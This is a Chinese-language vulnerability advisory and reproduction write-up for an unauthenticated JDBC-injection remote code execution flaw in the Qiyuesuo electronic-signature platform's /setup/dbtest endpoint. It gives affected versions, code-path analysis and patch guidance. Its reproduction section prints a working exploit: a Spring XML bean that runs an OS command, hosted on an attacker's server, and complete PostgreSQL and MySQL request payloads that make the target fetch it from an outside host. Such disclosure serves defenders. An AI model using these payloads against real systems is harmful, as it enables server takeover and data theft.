聲明：該文章來(lái)自（Timeline Sec）版權(quán)由原作者所有，K2OS渲染引擎提供網(wǎng)頁(yè)加速服務(wù)。

0x01 簡(jiǎn)介

契約鎖是上海亙巖網(wǎng)絡(luò)科技有限公司打造的電子簽約及印章管理平臺(tái)，聯(lián)合權(quán)威機(jī)構(gòu)提供數(shù)字身份、電子簽章、印章管控及數(shù)據(jù)存證服務(wù)，助力企業(yè)數(shù)字化轉(zhuǎn)型。其電子文件具備法律效力，支持多種簽署方式，可集成業(yè)務(wù)系統(tǒng)，滿足多行業(yè)需求。

0x02 漏洞概述

漏洞編號(hào)：QVD-2025-23408這是一個(gè)嚴(yán)重的遠(yuǎn)程代碼執(zhí)行漏洞，該漏洞源于管理控制臺(tái)存在未授權(quán) JDBC 注入漏洞，攻擊者無(wú)需身份認(rèn)證，通過(guò)構(gòu)造惡意數(shù)據(jù)庫(kù)連接參數(shù)，在?dbtest?接口觸發(fā)遠(yuǎn)程代碼執(zhí)行，這可能導(dǎo)致服務(wù)器被完全控制、數(shù)據(jù)泄露或業(yè)務(wù)系統(tǒng)淪陷。

0x03 利用條件

1）影響版本4.3.8 <= 契約鎖 <= 5.3.* && 補(bǔ)丁版本 < 2.1.54.0.* <= 契約鎖 <= 4.3.7 && 補(bǔ)丁版本 < 1.3.5

2）所需權(quán)限：無(wú)

0x04 漏洞復(fù)現(xiàn)

訪問(wèn)/setup/dbtest或/api/setup/dbtest

對(duì)POSTGRESQL數(shù)據(jù)庫(kù)進(jìn)行利用

新建1.xml文件，內(nèi)容如下，放至自己的VPS上

<beans?xmlns="http://www.springframework.org/schema/beans"? ? ? ?xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"? ? ? ?xmlns:p="http://www.springframework.org/schema/p"? ? ? ?xsi:schemaLocation="http://www.springframework.org/schema/beans? ? ? ? http://www.springframework.org/schema/beans/spring-beans.xsd">? ?<bean?id="exec"?class="java.lang.ProcessBuilder"?init-method="start">? ? ? ??<constructor-arg>? ? ? ? ??<list>? ? ? ? ? ??<value>cmd</value>? ? ? ? ? ??<value>/c</value>? ? ? ? ? ??<value>calc</value>? ? ? ? ??</list>? ? ? ??</constructor-arg>? ??</bean></beans>

執(zhí)行payload：/setup/dbtest?db=POSTGRESQL&host=localhost&port=5321&username=root&name=test%2F%3FsocketFactory%3Dorg%2Espringframework%2Econtext%2Esupport%2EClassPathXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2F100.XX.XXX.85:8099%2F1%2Exml

目標(biāo)主機(jī)上彈出計(jì)算器

mysql數(shù)據(jù)庫(kù)payload：/setup/dbtest?db=MYSQL&host=localhost&port=3306&username=root&name=test%2F%3FsocketFactory%3Dorg%2Espringframework%2Econtext%2Esupport%2EClassPathXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2Fxxx.dnslog.cn%2F1%2Exml

注意：是否存在/api/路徑需根據(jù)實(shí)際情況判斷，如存在，payload前需添加/api/

0x05 漏洞分析

com.qiyuesuo.config.ConsoleConfiguration?這個(gè)類有定義前臺(tái)不需要鑒權(quán)的接口，其中就包含了此次漏洞的接口?/setup/dbtest

問(wèn)題的入口點(diǎn)?com.qiyuesuo.setup.SetupController#dbtest?在代碼中請(qǐng)求了幾個(gè)參數(shù) host、port、name、username，接著我們追蹤?validateDatabase?方法

在?com.qiyuesuo.setup.SetupService#validateDatabase?方法中調(diào)用?dbset?方法建立數(shù)據(jù)庫(kù)連接，接著追蹤?dbtest?方法

在?com.qiyuesuo.setup.SetupService#dbtest?方法中可以看到，方法從?databaseService?獲取數(shù)據(jù)庫(kù)連接然后檢查連接是否非空且有效等等，然后追蹤?databaseService.getConnection?方法直接就是 jdbc 反序列化調(diào)用了

0x06 修復(fù)方式

1、緩解措施：避免將該系統(tǒng)管理端HTTP服務(wù)直接暴露在互聯(lián)網(wǎng)。2、修復(fù)建議：目前，官方已發(fā)布修復(fù)建議，建議受影響的用戶盡快升級(jí)至安全版本。

官方補(bǔ)丁下載地址：https://www.qiyuesuo.com/more/security/servicepack

參考鏈接

https://mp.weixin.qq.com/s/gmfx97xH4OHtGSJ0UmgOKA https://mp.weixin.qq.com/s/mRu0RCM4hDx0EwEWwwyLcQ https://blog.csdn.net/baidu_25299117/article/details/139990814

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全，洞悉企業(yè)級(jí)服務(wù)市場(chǎng)：https://www.ijiandao.com/